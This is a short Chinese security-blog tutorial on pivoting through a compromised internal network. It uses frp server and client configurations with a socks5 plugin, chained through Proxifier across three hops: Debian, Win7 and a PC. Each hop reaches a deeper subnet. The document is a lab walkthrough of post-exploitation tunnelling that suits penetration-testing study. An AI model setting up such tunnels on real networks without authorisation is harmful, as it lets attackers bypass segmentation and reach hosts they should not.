:信安文摘
目录
前言
当到达内网某个网段时,该网段被控机器不直接通外网,我们就需要借助内网可出网机器构建多层代理。
参考链接:【国科漏斗社区】四步学会Frp构建多层内网通信隧道!
https://mp.weixin.qq.com/s/vkngH509M3lzrhWeoLnB_A
模拟环境
以frp工具为例。
隧道搭建
第一层隧道
拿到Debian主机权限
VPS主机启动frps监听:
[common] bind_addr = 0.0.0.0 bind_port = 7000Debian启动frpc:
[common] server_addr = 192.168.53.132 server_port = 7000 [http_proxy] type = tcp local_ip = 10.10.20.131 remote_port = 8888 local_port = 8888 plugin = socks5proxifier配置:
就可以访问10.10.20.0/24网段了。
第二层隧道
拿到Win7主机权限
Debian启动frps监听:
[common] bind_addr = 10.10.20.131 bind_port = 7000Win7启动frpc:
[common] server_addr = 10.10.20.131 server_port = 7000 [http_proxy] type = tcp local_ip = 10.10.30.130 remote_port = 8888 local_port = 8888 plugin = socks5proxifier配置并使用代理链:
就可以访问10.10.30.0/24网段了。
第三层隧道
拿到PC权限
Win7启动frps监听
PC启动frpc
proxifier配置并使用代理链:
就可以访问172.16.5.0/24网段了。
其他多级代理链同上。
:信安文摘